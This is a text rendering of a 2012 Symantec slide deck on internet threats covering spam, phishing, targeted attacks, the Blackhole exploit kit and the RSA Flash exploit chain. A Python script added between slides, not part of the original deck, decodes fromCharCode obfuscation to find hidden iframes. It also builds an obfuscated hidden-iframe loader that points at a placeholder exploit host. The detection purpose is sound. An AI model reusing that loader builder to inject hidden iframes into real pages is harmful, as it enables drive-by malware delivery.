Understanding Risk: The Internet Threat Landscape Paul Wood
Slide 1: Title
Understanding Risk: The Internet Threat Landscape. Paul Wood, Cyber Security Intelligence.

Slide 2: Introduction
• Spam levels falling as spam becomes more targeted
• Malware attacks continue to grow rapidly
• Number of data breaches continues to rise
• Mobile threats expose organizations and consumers
• Targeted attacks have expanded and increased in number
• No business is too small to be a target…

Slide 3: Symantec Intelligence
[Map: Symantec Intelligence locations: Dublin, Ireland; Toronto, Canada; Gloucester, UK; San Francisco, CA; Mountain View, CA; Tokyo, Japan; Chengdu, China; Austin, TX; Culver City, CA; Pune, India; Chennai, India; Taipei, Taiwan; Sydney, Australia. Diagram labels: 24x7 Event Logging, Rapid Detection, Preemptive Security Alerts, Information Protection, Threat Triggered Actions]
Global scope and scale:
• Worldwide coverage (attack activity): 64M+ sensors, 200+ countries and territories
• Malware intelligence: 135M+ systems monitored, 11 security response centers
• Vulnerabilities: 48,000+ vulnerabilities, 16,000+ vendors, 105,000+ technologies
• Spam/phishing: 5M+ decoy accounts, 8B+ email messages/day, 1B+ web requests/day

Slide 4: Spam Levels Falling As Spam Becomes More Targeted (section header)

Slide 5: Spam Activity Trends (December 2012)
[Chart: global spam rate 70.6% (last month 68.8%, six-month average 69.9%), trend 2006 to 2012. Panels: Top 5 geographies: Saudi Arabia 85.9%, Hungary 81.9%, Sri Lanka 77.2%, Qatar 75.5%, China 75.4%. Top 5 verticals: IT Services 72.2%, Education 71.8%, Recreation 71.6%, Non-Profit 71.5%, Accommodation/Catering 71.3%. By horizontal (company size bands 1-250 to 2501+). Sources: United States 12.7%, India 6.9%, Canada 6.3%, Russian Federation 4.8%, Brazil 4.3%, Finland 3.7%, Peru 3.09%, Germany 3.08%, Korea (South) 3.07%, France 3.06%]

Slide 6: What are spam-sending botnets?
[Diagram: Botnet Controller → Command & Control → bots]
• Approx. USD $15 for 10,000 bots

Slide 7: Social Engineering + Social Media = Targeted Spam
• Cyber criminals taking advantage of social media
– Social media is viral in nature
– Use of ‘trending topics’ and news feeds to target users
– People are less suspicious of content from friends
– Shortened URLs frequently used
– Social engineering is effective with social media

Slide 8: Malware Attacks Continue to Grow Rapidly (section header)

Slide 9: Email Malware Activity Trends (December 2012)
[Chart: global virus rate 1 in 277.8 (last month 1 in 255.8, six-month average 1 in 258.0), trend 2006 to 2012. Panels: Top 5 geographies: South Africa 1 in 77.5, Australia 1 in 94.0, United Kingdom 1 in 177.3, Italy 1 in 266.4, Canada 1 in 290.1. Top 5 verticals: Public Sector 1 in 69.4, Transport/Utilities 1 in 125.5, Recreation 1 in 179.9, Education 1 in 207.3, Marketing/Media 1 in 233.0. By horizontal (company size bands 1-250 to 2501+). Sources: United States 40.9%, United Kingdom 24.9%, Australia 9.1%, India 4.3%, Sweden 2.9%, Canada 2.5%, Brazil 2.1%, Netherlands 1.7%, Hong Kong 1.7%, France 1.6%]
• 27.2% of email malware contained URLs
• Approx. 0.2% are targeted

Slide 10: New ‘fast-flux’ update to Blackhole in June 2012
[Diagram: Compromised Web Site → DNS → lfbovcaitd[~~~~~].ru]
• Compromised server hosts malicious JavaScript code to load exploits
• Domain name of exploit server is calculated from the date
• Exploit is loaded via hidden IFRAME
• Domains are registered months in advance
* http://www.symantec.com/connect/blogs/blackhole-theory

Slide 11: New update to ‘Blackhole’ in June 2012
• Exploits hosted ‘in-the-cloud’
• DNS fast-flux used to hide IP
[Screenshot of the landing-page script] This code uses the fromCharCode() method of the String object to build up a huge string containing JavaScript code to run…
Hidden IFRAME loads exploits hosted on: lfbovcaitd[REMOVED].ru

Slide 12: Targeted Attacks Have Expanded (section header)

Slide 13: Typical profile of a phishing attack
[Diagram] Social engineering → Malicious URLs appear in emails designed to appear legitimate → Spoofed or compromised website is used to capture account information or install malware

Slide 14: Phishing Activity Trends (December 2012)
[Chart: global phishing rate 1 in 377.4 (last month 1 in 445.1, six-month average 1 in 357.2), trend 2006 to 2012. Panels: Top 5 geographies: Norway 1 in 81.4, South Africa 1 in 84.2, Spain 1 in 90.0, United Kingdom 1 in 229.3, Singapore 1 in 253.8. Top 5 verticals: Public Sector 1 in 134.7, Marketing/Media 1 in 211.1, Agriculture 1 in 223.0, Education 1 in 230.9, Estate Agents 1 in 258.0. By horizontal: 1-250 1 in 221.7, 251-500 1 in 544.9, 501-1000 1 in 589.8, 1001-1500 1 in 574.6, 1501-2500 1 in 479.8, 2501+ 1 in 418.6. Sources: United States 24.2%, Norway 20.2%, Spain 17.8%, United Kingdom 16.3%, Hong Kong 9.1%, Korea, Republic of 3.8%, Canada 1.9%, Germany 1.5%, France 0.9%, Australia 0.9%]
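As an added defender-side example (not from the presentation), a small Python triage script for the landing-page pattern described on slides 10 and 11: it decodes the String.fromCharCode() layer and reports the hosts that any hidden IFRAME would load. The obfuscated sample is constructed inside the script by the hypothetical helper _obfuscate(), and exploit-host.example is a placeholder host, not an indicator from the deck.

```python
import re
from urllib.parse import urlparse

# A String.fromCharCode(...) call and its comma-separated numeric argument list.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([^)]*)\)")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
INVISIBLE_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

def decode_fromcharcode(js: str) -> str:
    """Concatenate the output of every String.fromCharCode(...) call in js."""
    chars = []
    for args in FROMCHARCODE.findall(js):
        for tok in args.split(","):
            tok = tok.strip()
            if tok:  # accept decimal (60) and hex (0x3c) character codes
                chars.append(chr(int(tok, 16) if tok.lower().startswith("0x") else int(tok)))
    return "".join(chars)

def _attr(attrs: str, name: str):
    """Return the value of one HTML attribute from an iframe's attribute string."""
    m = re.search(r"""\b%s\s*=\s*['"]?([^'"\s>]+)""" % name, attrs, re.IGNORECASE)
    return m.group(1) if m else None

def hidden_iframe_hosts(html: str) -> list:
    """Hosts loaded by iframes that are sized or styled so the user never sees them."""
    hosts = []
    for attrs in IFRAME_TAG.findall(html):
        dims = [_attr(attrs, d) for d in ("width", "height")]
        tiny = all(d is not None and d.rstrip("px").isdigit() and int(d.rstrip("px")) <= 2 for d in dims)
        if (tiny or INVISIBLE_STYLE.search(attrs)) and (src := _attr(attrs, "src")):
            hosts.append(urlparse(src).hostname or src)
    return hosts

def triage(js: str) -> list:
    """Decode the fromCharCode layer, then report hidden iframe destinations."""
    return hidden_iframe_hosts(decode_fromcharcode(js))

def _obfuscate(payload: str, chunk: int = 12) -> str:
    """Constructed sample builder mimicking the landing-page style: the HTML is
    rebuilt from fromCharCode() chunks and written into the compromised page."""
    parts = [",".join(str(ord(c)) for c in payload[i:i + chunk]) for i in range(0, len(payload), chunk)]
    return "var s=" + "+".join("String.fromCharCode(%s)" % p for p in parts) + ";document.write(s);"

# Constructed sample; exploit-host.example is a placeholder, not a real indicator.
SAMPLE_JS = _obfuscate('<iframe src="http://exploit-host.example/main.php" width="1" height="1" style="visibility:hidden"></iframe>')

if __name__ == "__main__":
    print(triage(SAMPLE_JS))  # ['exploit-host.example']
```

The heuristics (tiny dimensions, hidden style) are the cheap tell described on the slides; a real gateway would also follow the `+` concatenation and `eval` patterns that a kit may use to split the string further.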
Slide 15: Characteristics of Targeted Attacks
Targeted                                    Non-Targeted
Rare                                        Very common
Attack relevant to interests of recipient   No regard to recipient
Low copy number                             High copy number
Bespoke malware                             Often kit based
Obscure business model                      Clear financial incentive
“The attackers’ aim appears to be covert gathering and transmitting of commercially or economically valuable information…”

Slide 16: Targeted Attacks and Social Engineering
[Diagram: Attacker → email carrying http://compromised URL/abc.html → Target]

Slide 17: Risk from Targeted Attacks Increased in 2011: Global
• Average of 80 attacks per day in 2011*
[Chart: attacks per day, 2011]
* Analysis based on Symantec customers: 2011

Slide 18: Targeted Attacks by Job Function
[Chart]

Slide 19: Risk from Targeted Attacks Continues in 2012: Global
• Average of 186 attacks per day in 2012*
* Analysis based on Symantec customers: Jan to June 2012

Slide 20: Targeted Attacks by Target Geography: 2012
[Chart]
* Analysis based on Symantec customers: Jan to June 2012

Slide 21: Case Study: Large Scale Attack Against One Client
• Single client targeted by thousands of attacks over a few days – very rare!
• Many users targeted using different exploits and social engineering tactics

Slide 22: Case Study: Office Documents Containing Exploits
• Office document contains exploit that drops malicious code
• Detected by Skeptic™ only…

Slide 23: Case Study: Encrypted Office Documents
• Word document is password protected
• Password contained in email message
• Exploit contained in document
• Document contains hidden code that is executed…

Slide 24: Case Study: Attacks Against Entertainment Industry
• A series of attacks have been conducted over a period of at least two years against a company that produces video games
• The purpose of these attacks seems to be to gain access to the intellectual property used within their products
• The Japanese text shown in the second example translates to: "Hope to correct accidentally discovered a design flaw in the game."

Slide 25: Case Study: RSA Attacks (CVE-2011-0609): Begins with a Spear Phishing Email
Traits:
• Related to recipient’s line of work
• “Strange” English
• Email recipient is rarely the end target
• Emails are often reused

Slide 26: Case Study: RSA Attacks (CVE-2011-0609): Zero-day Flash Exploit Used to Drop Backdoor
[Diagram of the attack chain]
• XLS attachment contains embedded SWF
• SWF-1 decodes SWF-2 and provides heap spray for shellcode
• SWF-2 exploits Flash vulnerability CVE-2011-0609
• Shellcode drops malicious executable and runs it to install backdoor program

Slide 27: No business is too small to be a target… (section header)

Slide 28: Targeted Attacks by Size: Global, 2012
• Attacks against organizations in the >2500 size band increased from 50% in 2011 to 52% in 2012
• SMB attacks increased from 18% to 31%

Slide 29: Targeted Attacks by Industry Sector: Global, 2012
[Chart]

Slide 30: What’s Ahead?
• Targeted attacks will be ongoing and will expand
• Macs are not immune to malware
– The use of Java for cross-platform attacks was discussed in ISTR 16
– Attack kits include Mac exploits
• Malware authors will capitalize on co-mingling of work and personal lives
– BYOD concerns will continue in 2013 as SMBs begin to tackle the issues
– As financial transactions move to mobile devices, attackers will follow
• Attacks exploiting social media will continue
– Social apps via mobile devices will become more popular targets, especially those aimed at teenagers and young adults

Slide 31: Tips to avoid falling victim to a targeted attack
• Requires at least three things:
– Education: help people know what to look for and be suspicious
– Policies: try to reduce risk by establishing AUPs and communicating them
– Technology: can prevent attacks and manage policies
• For PR, HR and generic accounts (e.g. info@) be especially cautious. These are often targeted as they expect to receive emails from people they don’t know, with attachments such as documents or zipped files
• Be careful what you say on social networks, who you connect with and how you use social media in general: too much information can help the attackers
• Remember: targeted attacks will be relevant and may come from someone you know. Good technology can help to protect you…

Slide 32: End-to-End Messaging Security
[Diagram: Symantec Email Security.cloud (CLOUD) → Secure Email Gateway / Symantec Messaging Gateway (DMZ) → MS Exchange Edge Transport Server; Symantec Mail Security for Exchange on the internal side; SMTP and MAPI links labelled]
Gateway layer: Reduce infrastructure demands by removing threats and unwanted mail in the cloud or at the gateway with Symantec Messaging Gateway or Symantec Email Security.cloud.
[Diagram, continued: MS Exchange Hub Transport / CAS Server → MAPI/EWS → MS Exchange Mailbox Server, within the INTERNAL/PRIVATE NETWORK]
Internal layer: Detect threats amongst internal traffic and provide a second layer of protection with Symantec Mail Security for Exchange. Protects the core messaging infrastructure with the ability to detect previously unknown threats and apply content control policies retroactively on mailbox data.

Slide 33: Symantec.cloud Email Services: A Cloud Security Approach
[Diagram of inbound and outbound mail flow. Inbound: “All mail to your organization” passes through Traffic Shaper, Commercial DNS Blocklists, SMTP Heuristics, User Validation, Brightmail™, Symantec AV Engine and Skeptic™, so that “All mail delivered to users is clean, legitimate & relevant”. Outbound: “All mail from customer’s organization is clean, legitimate & relevant”. Control services: Archiving (store only relevant email: less on-premises storage, easier to index and search), Continuity (access their email even if their mail servers fail), Policy Based Encryption (apply encryption based on policy)]

Slide 34: Skeptic™: Knowing What a Safe Document Looks Like
• Comparison of legitimate Office document vs. a document containing hidden executable code
[Screenshots of the two documents]

Slide 35: Thank you!
Paul Wood, [email protected]
@symantec, @symanteccloud, @norton, @threatintel, @paulowoody
www.symanteccloud.com/intelligence
www.symantec.com/spam

Copyright © 2012 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.